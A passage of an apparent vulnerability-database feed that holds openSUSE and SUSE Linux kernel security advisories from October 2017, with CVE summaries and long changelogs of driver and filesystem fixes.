records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - Update patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-check.patch\n (bsc#1036737).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function (bsc#1060229).\n - x86/cpu/amd: Limit cpu_core_id fixup to families older than F17h\n (bsc#1060229).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/mm: Fix boot crash caused by incorrect loop count calculation in\n sync_global_pgds() (bsc#1058512).\n - x86/mm: Fix fault error path using unsafe vma pointer (fate#321300).\n\n", "edition": 1, "modified": "2017-10-17T15:15:08", "published": "2017-10-17T15:15:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00019.html", "id": "OPENSUSE-SU-2017:2741-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-25T16:31:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-14106", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-12154"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a crafted ACPI\n table (bnc#1049580).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS guest users to\n corrupt block device data streams and consequently obtain sensitive\n memory information, cause a denial of service, or gain host OS\n privileges by leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bsc#1053919).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1056061 1063479 1063667 1063671).\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel allowed local users\n to cause a denial of service (memory corruption and system crash) by\n leveraging root access (bnc#1056588).\n - CVE-2017-14106: The tcp_disconnect function in net/ipv4/tcp.c in the\n Linux kernel allowed local users to cause a denial of service\n (__tcp_select_window divide-by-zero error and system crash) by\n triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15265: Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allowed local users to have unspecified impact via vectors\n related to /dev/snd/seq (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - acpi: apd: Add clock frequency for Hisilicon Hip07/08 I2C controller\n (bsc#1049291).\n - acpi: apd: Fix HID for Hisilicon Hip07/08 (bsc#1049291).\n - acpi: apei: Enable APEI multiple GHES source to share a single external\n IRQ (bsc#1053627).\n - acpica: iort: Update SMMU models for revision C (bsc#1036060).\n - acpi: irq: Fix return code of acpi_gsi_to_irq() (bsc#1053627).\n - acpi/nfit: Fix memory corruption/Unregister mce decoder on failure\n (bsc#1057047).\n - acpi: pci: fix GIC irq model default PCI IRQ polarity (bsc#1053629).\n - acpi/processor: Check for duplicate processor ids at hotplug time\n (bnc#1056230).\n - acpi/processor: Implement DEVICE operator for processor enumeration\n (bnc#1056230).\n - ahci: do not use MSI for devices with the silly Intel NVMe remapping\n scheme (bsc#1048912).\n - ahci: thunderx2: stop engine fix update (bsc#1057031).\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - alsa: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - alsa: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - alsa: hda - Workaround for i915 KBL breakage\n (bsc#1048356,bsc#1047989,bsc#1055272).\n - alsa: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - alsa: usb-audio: Apply sample rate quirk to Sennheiser headset\n (bsc#1052580).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: add function to get a cpu's MADT GICC table (bsc#1062279).\n - arm64: do not trace atomic operations (bsc#1055290).\n - arm64: dts: Add Broadcom Vulcan PMU in dts (fate#319481).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm64: mm: select CONFIG_ARCH_PROC_KCORE_TEXT (bsc#1046529).\n - arm64: pci: Fix struct acpi_pci_root_ops allocation failure path\n (bsc#1056849).\n - arm64/perf: Access pmu register using <read/write>_sys_reg (bsc#1062279).\n - arm64/perf: Add Broadcom Vulcan PMU support (fate#319481).\n - arm64/perf: Changed events naming as per the ARM ARM (fate#319481).\n - arm64/perf: Define complete ARMv8 recommended implementation defined\n events (fate#319481).\n - arm64: perf: do not expose CHAIN event in sysfs (bsc#1062279).\n - arm64: perf: Extend event config for ARMv8.1 (bsc#1062279).\n - arm64/perf: Filter common events based on PMCEIDn_EL0 (fate#319481).\n - arm64: perf: Ignore exclude_hv when kernel is running in HYP\n (bsc#1062279).\n - arm64: perf: move to common attr_group fields (bsc#1062279).\n - arm64: perf: Use the builtin_platform_driver (bsc#1062279).\n - arm64: pmu: add fallback probe table (bsc#1062279).\n - arm64: pmu: Hoist pmu platform device name (bsc#1062279).\n - arm64: pmu: Probe default hw/cache counters (bsc#1062279).\n - arm64: pmuv3: handle pmuv3+ (bsc#1062279).\n - arm64: pmuv3: handle !PMUv3 when probing (bsc#1062279).\n - arm64: pmuv3: use arm_pmu ACPI framework (bsc#1062279).\n - arm64: pmu: Wire-up Cortex A53 L2 cache events and DTLB refills\n (bsc#1062279).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm/perf: Convert to hotplug state machine (bsc#1062279).\n - arm/perf: Fix hotplug state machine conversion (bsc#1062279).\n - arm/perf: Use multi instance instead of custom list (bsc#1062279).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: a7b8829d242b1a58107e9c02b09e93aec446d55c is not\n applicable\n - blacklist.conf: Add commit b5accbb0dfae\n - blacklist.conf: add one more\n - blacklist.conf: Blacklist d12fe87e62d7 signal/testing: Do not look for\n __SI_FAULT in userspace It just fixes a self-test.\n - blacklist.conf: e859afe1ee0c5ae981c55387ccd45eba258a7842 is not\n applicable\n - blacklist.conf: fixes on relevant for MIPS/driver not in our tree\n - blacklist.conf: gcc7 compiler warning (bsc#1056849)\n - block: genhd: add device_add_disk_with_groups (bsc#1060400).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - block: return on congested block device (FATE#321994).\n - bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - bnx2x: Do not log mc removal needlessly (bsc#1019680 FATE#321692).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Add a callback to inform RDMA driver during PCI shutdown\n (bsc#1053309).\n - bnxt_en: Add additional chip ID definitions (bsc#1053309).\n - bnxt_en: Add bnxt_get_num_stats() to centrally get the number of ethtool\n stats (bsc#1053309).\n - bnxt_en: Add missing logic to handle TPA end error conditions\n (bsc#1053309).\n - bnxt_en: Add PCI IDs for BCM57454 VF devices (bsc#1053309).\n - bnxt_en: Allow the user to set ethtool stats-block-usecs to 0\n (bsc#1053309).\n - bnxt_en: Call bnxt_dcb_init() after getting firmware DCBX configuration\n (bsc#1053309).\n - bnxt_en: Check status of firmware DCBX agent before setting\n DCB_CAP_DCBX_HOST (bsc#1053309).\n - bnxt_en: Do not setup MAC address in bnxt_hwrm_func_qcaps() (bsc#963575\n FATE#320144).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix bug in ethtool -L (bsc#1053309).\n - bnxt_en: Fix netpoll handling (bsc#1053309).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path (bnc#1038583).\n - bnxt_en: Fix race conditions in .ndo_get_stats64() (bsc#1053309).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Fix SRIOV on big-endian architecture (bsc#1053309).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: Fix xmit_more with BQL (bsc#1053309).\n - bnxt_en: Free MSIX vectors when unregistering the device from bnxt_re\n (bsc#1020412 FATE#321671).\n - bnxt_en: Implement ndo_bridge_{get|set}link methods (bsc#1053309).\n - bnxt_en: Implement xmit_more (bsc#1053309).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - bnxt_en: Optimize doorbell write operations for newer chips\n (bsc#1053309).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Pass in sh parameter to bnxt_set_dflt_rings() (bsc#1053309).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - bnxt_en: Report firmware DCBX agent (bsc#1053309).\n - bnxt_en: Retrieve the hardware bridge mode from the firmware\n (bsc#1053309).\n - bnxt_en: Set ETS min_bw parameter for older firmware (bsc#1053309).\n - bnxt_en: Support for Short Firmware Message (bsc#1053309).\n - bnxt_en: Update firmware interface spec to 1.8.0 (bsc#1053309).\n - bnxt: fix unsigned comparsion with 0 (bsc#1053309).\n - bnxt: fix unused variable warnings (bsc#1053309).\n - bnxt_re: Do not issue cmd to delete GID for QP1 GID entry before the QP\n is destroyed (bsc#1056596).\n - bnxt_re: Fix compare and swap atomic operands (bsc#1056596).\n - bnxt_re: Fix memory leak in FRMR path (bsc#1056596).\n - bnxt_re: Fix race between the netdev register and unregister events\n (bsc#1037579).\n - bnxt_re: Fix update of qplib_qp.mtu when modified (bsc#1056596).\n - bnxt_re: Free up devices in module_exit path (bsc#1056596).\n - bnxt_re: Remove RTNL lock dependency in bnxt_re_query_port (bsc#1056596).\n - bnxt_re: Stop issuing further cmds to FW once a cmd times out\n (bsc#1056596).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: nowait aio: Correct assignment of pos (FATE#321994).\n - btrfs: nowait aio support (FATE#321994).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - ceph: avoid accessing freeing inode in ceph_check_delayed_caps()\n (bsc#1048228).\n - ceph: avoid invalid memory dereference in the middle of umount\n (bsc#1048228).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: cleanup writepage_nounlock() (bsc#1048228).\n - ceph: do not re-send interrupted flock request (bsc#1048228).\n - ceph: fix message order check in handle_cap_export() (bsc#1061451).\n - ceph: fix NULL pointer dereference in ceph_flush_snaps() (bsc#1061451).\n - ceph: fix readpage from fscache (bsc#1057015).\n - ceph: getattr before read on ceph.* xattrs (bsc#1048228).\n - ceph: handle epoch barriers in cap messages (bsc#1048228).\n - ceph: limit osd read size to CEPH_MSG_MAX_DATA_LEN (bsc#1061451).\n - ceph: limit osd write size (bsc#1061451).\n - ceph: new mount option that specifies fscache uniquifier (bsc#1048228).\n - ceph: redirty page when writepage_nounlock() skips unwritable page\n (bsc#1048228).\n - ceph: remove special ack vs commit behavior (bsc#1048228).\n - ceph: remove useless page->mapping check in writepage_nounlock()\n (bsc#1048228).\n - ceph: re-request max size after importing caps (bsc#1048228).\n - ceph: stop on-going cached readdir if mds revokes FILE_SHARED cap\n (bsc#1061451).\n - ceph: update ceph_dentry_info::lease_session when necessary\n (bsc#1048228).\n - ceph: update the 'approaching max_size' code (bsc#1048228).\n - ceph: validate correctness of some mount options (bsc#1061451).\n - ceph: when seeing write errors on an inode, switch to sync writes\n (bsc#1048228).\n - cifs: add build_path_from_dentry_optional_prefix() (fate#323482).\n - cifs: add use_ipc flag to SMB2_ioctl() (fate#323482).\n - cifs: Fix maximum SMB2 header size (bsc#1056185).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: Fix sparse warnings (fate#323482).\n - cifs: implement get_dfs_refer for SMB2+ (fate#323482).\n - cifs: let ses->ipc_tid hold smb2 TreeIds (fate#323482).\n - cifs: move DFS response parsing out of SMB1 code (fate#323482).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - cifs: remove any preceding delimiter from prefix_path (fate#323482).\n - cifs: set signing flag in SMB2+ TreeConnect if needed (fate#323482).\n - cifs: use DFS pathnames in SMB2+ Create requests (fate#323482).\n - clocksource/drivers/arm_arch_timer: Fix mem frame loop initialization\n (bsc#1055709).\n - cpufreq: intel_pstate: Disable energy efficiency optimization\n (bsc#1054654).\n - crush: assume weight_set != null imples weight_set_size > 0\n (bsc#1048228).\n - crush: crush_init_workspace starts with struct crush_work (bsc#1048228).\n - crush: implement weight and id overrides for straw2 (bsc#1048228).\n - crush: remove an obsolete comment (bsc#1048228).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: chcr - Add ctr mode and process large sg entries for cipher\n (bsc#1048325).\n - crypto: chcr - Avoid changing request structure (bsc#1048325).\n - crypto: chcr - Ensure Destination sg entry size less than 2k\n (bsc#1048325).\n - crypto: chcr - Fix fallback key setting (bsc#1048325).\n - crypto: chcr - Pass lcb bit setting to firmware (bsc#1048325).\n - crypto: chcr - Return correct error code (bsc#1048325).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxgb4: update latest firmware version supported (bsc#1048327).\n - cxgbit: add missing __kfree_skb() (bsc#1052095).\n - cxgbit: fix sg_nents calculation (bsc#1052095).\n - cxl: Fix driver use count (bnc#1012382).\n - device-dax: fix cdev leak (bsc#1057047).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - dmaengine: mv_xor_v2: do not use descriptors not acked by async_tx\n (bsc#1056849).\n - dmaengine: mv_xor_v2: enable XOR engine after its configuration\n (bsc#1056849).\n - dmaengine: mv_xor_v2: fix tx_submit() implementation (bsc#1056849).\n - dmaengine: mv_xor_v2: handle mv_xor_v2_prep_sw_desc() error properly\n (bsc#1056849).\n - dmaengine: mv_xor_v2: properly handle wrapping in the array of HW\n descriptors (bsc#1056849).\n - dmaengine: mv_xor_v2: remove interrupt coalescing (bsc#1056849).\n - dmaengine: mv_xor_v2: set DMA mask to 40 bits (bsc#1056849).\n - dm mpath: do not lock up a CPU with requeuing activity (bsc#1048912).\n - documentation: arm64: pmu: Add Broadcom Vulcan PMU binding (fate#319481).\n - driver-core: platform: Add platform_irq_count() (bsc#1062279).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: base: cacheinfo: fix boot error message when acpi is enabled\n (bsc#1057849).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (FATE#319482 bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n - drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drivers/perf: arm_pmu_acpi: avoid perf IRQ init when guest PMU is off\n (bsc#1062279).\n - drivers/perf: arm_pmu_acpi: Release memory obtained by kasprintf\n (bsc#1062279).\n - drivers/perf: arm_pmu: add ACPI framework (bsc#1062279).\n - drivers/perf: arm_pmu: add common attr group fields (bsc#1062279).\n - drivers/perf: arm_pmu: Always consider IRQ0 as an error (bsc#1062279).\n - drivers/perf: arm_pmu: Avoid leaking pmu->irq_affinity on error\n (bsc#1062279).\n - drivers/perf: arm_pmu: avoid NULL dereference when not using devicetree\n (bsc#1062279).\n - drivers/perf: arm-pmu: convert arm_pmu_mutex to spinlock (bsc#1062279).\n - drivers/perf: arm_pmu: Defer the setting of __oprofile_cpu_pmu\n (bsc#1062279).\n - drivers/perf: arm_pmu: define armpmu_init_fn (bsc#1062279).\n - drivers/perf: arm_pmu: expose a cpumask in sysfs (bsc#1062279).\n - drivers/perf: arm_pmu: factor out pmu registration (bsc#1062279).\n - drivers/perf: arm-pmu: Fix handling of SPI lacking "interrupt-affinity"\n property (bsc#1062279).\n - drivers/perf: arm_pmu: Fix NULL pointer dereference during probe\n (bsc#1062279).\n - drivers/perf: arm-pmu: fix RCU usage on pmu resume from low-power\n (bsc#1062279).\n - drivers/perf: arm_pmu: Fix reference count of a device_node in\n of_pmu_irq_cfg (bsc#1062279).\n - drivers/perf: arm_pmu: fold init into alloc (bsc#1062279).\n - drivers/perf: arm_pmu: handle no platform_device (bsc#1062279).\n - drivers/perf: arm-pmu: Handle per-interrupt affinity mask (bsc#1062279).\n - drivers/perf: arm_pmu: implement CPU_PM notifier (bsc#1062279).\n - drivers/perf: arm_pmu: make info messages more verbose (bsc#1062279).\n - drivers/perf: arm_pmu: manage interrupts per-cpu (bsc#1062279).\n - drivers/perf: arm_pmu: move irq request/free into probe (bsc#1062279).\n - drivers/perf: arm_pmu: only use common attr_groups (bsc#1062279).\n - drivers/perf: arm_pmu: remove pointless PMU disabling (bsc#1062279).\n - drivers/perf: arm_pmu: rename irq request/free functions (bsc#1062279).\n - drivers/perf: arm_pmu: Request PMU SPIs with IRQF_PER_CPU (bsc#1062279).\n - drivers/perf: arm_pmu: rework per-cpu allocation (bsc#1062279).\n - drivers/perf: arm_pmu: simplify cpu_pmu_request_irqs() (bsc#1062279).\n - drivers/perf: arm_pmu: split cpu-local irq request/free (bsc#1062279).\n - drivers/perf: arm_pmu: split irq request from enable (bsc#1062279).\n - drivers/perf: arm_pmu: split out platform device probe logic\n (bsc#1062279).\n - drivers/perf: kill armpmu_register (bsc#1062279).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - e1000e: use disable_hardirq() also for MSIX vectors in e1000_netpoll()\n (bsc#1022912 FATE#321246).\n - edac, sb_edac: Assign EDAC memory controller per h/w controller\n (bsc#1061721).\n - edac, sb_edac: Avoid creating SOCK memory controller (bsc#1061721).\n - edac, sb_edac: Bump driver version and do some cleanups (bsc#1061721).\n - edac, sb_edac: Carve out dimm-populating loop (bsc#1061721).\n - edac, sb_edac: Check if ECC enabled when at least one DIMM is present\n (bsc#1061721).\n - edac, sb_edac: Classify memory mirroring modes (bsc#1061721).\n - edac, sb_edac: Classify PCI-IDs by topology (bsc#1061721).\n - edac, sb_edac: Do not create a second memory controller if HA1 is not\n present (bsc#1061721).\n - edac, sb_edac: Do not use "Socket#" in the memory controller name\n (bsc#1061721).\n - edac, sb_edac: Drop NUM_CHANNELS from 8 back to 4 (bsc#1061721).\n - edac, sb_edac: Fix mod_name (bsc#1061721).\n - edac, sb_edac: Get rid of ->show_interleave_mode() (bsc#1061721).\n - edac, sb_edac: Remove double buffering of error records (bsc#1061721).\n - edac, sb_edac: Remove NULL pointer check on array pci_tad (bsc#1061721).\n - edac, skx_edac: Handle systems with segmented PCI busses (bsc#1063102).\n - edac, thunderx: Fix a warning during l2c debugfs node creation\n (bsc#1057038).\n - edac, thunderx: Fix error handling path in thunderx_lmc_probe()\n (bsc#1057038).\n - efi/fb: Avoid reconfiguration of BAR that covers the framebuffer\n (bsc#1051987).\n - efi/fb: Correct PCI_STD_RESOURCE_END usage (bsc#1051987).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: nowait aio support (FATE#321994).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix flags ordering (bsc#1034075 comment 131)\n - Fix mpage_writepage() for pages with buffers (bsc#1050471).\n - fix whitespace according to upstream commit\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs/epoll: cache leftmost node (bsc#1056427).\n - fs: Introduce filemap_range_has_page() (FATE#321994).\n - fs: Introduce RWF_NOWAIT and FMODE_AIO_NOWAIT (FATE#321994).\n - fs/mpage.c: fix mpage_writepage() for pages with buffers (bsc#1050471).\n Update to version in mainline\n - fs/proc: kcore: use kcore_list type to check for vmalloc/module address\n (bsc#1046529).\n - fs: return if direct I/O will trigger writeback (FATE#321994).\n - fs: Separate out kiocb flags setup based on RWF_* flags (FATE#321994).\n - fs: Use RWF_* flags for AIO operations (FATE#321994).\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - Hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: designware: Add ACPI HID for Hisilicon Hip07/08 I2C controller\n (bsc#1049291).\n - i2c: designware: Convert to use unified device property API\n (bsc#1049291).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i2c: xgene: Set ACPI_COMPANION_I2C (bsc#1053633).\n - i2c: xgene-slimpro: Add ACPI support by using PCC mailbox (bsc#1053633).\n - i2c: xgene-slimpro: include linux/io.h for memremap (bsc#1053633).\n - i2c: xgene-slimpro: Use a single function to send command message\n (bsc#1053633).\n - i40e/i40evf: fix out-of-bounds read of cpumask (bsc#1053685).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#1024346\n FATE#321239 bsc#1024373 FATE#321247).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Add generic function to extract IB speed from netdev\n (bsc#1056596).\n - ib/core: Add ordered workqueue for RoCE GID management (bsc#1056596).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/hns: checking for IS_ERR() instead of NULL (bsc#1056849).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382 bsc#1022595\n FATE#322350).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (FATE#322350 bnc#1012382 bsc#1022595).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (FATE#322350\n bnc#1012382 bsc#1022595).\n - ib/mlx5: Change logic for dispatching IB events for port state\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - ib/mlx5: Fix cached MR allocation flow (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Clean up resources on probe failure (fate#323285, bsc#1058116).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (FATE#321231\n FATE#321473 FATE#322149 FATE#322153 bnc#1012382).\n - ib/rxe: Add dst_clone() in prepare_ipv6_hdr() (bsc#1049361).\n - ib/rxe: 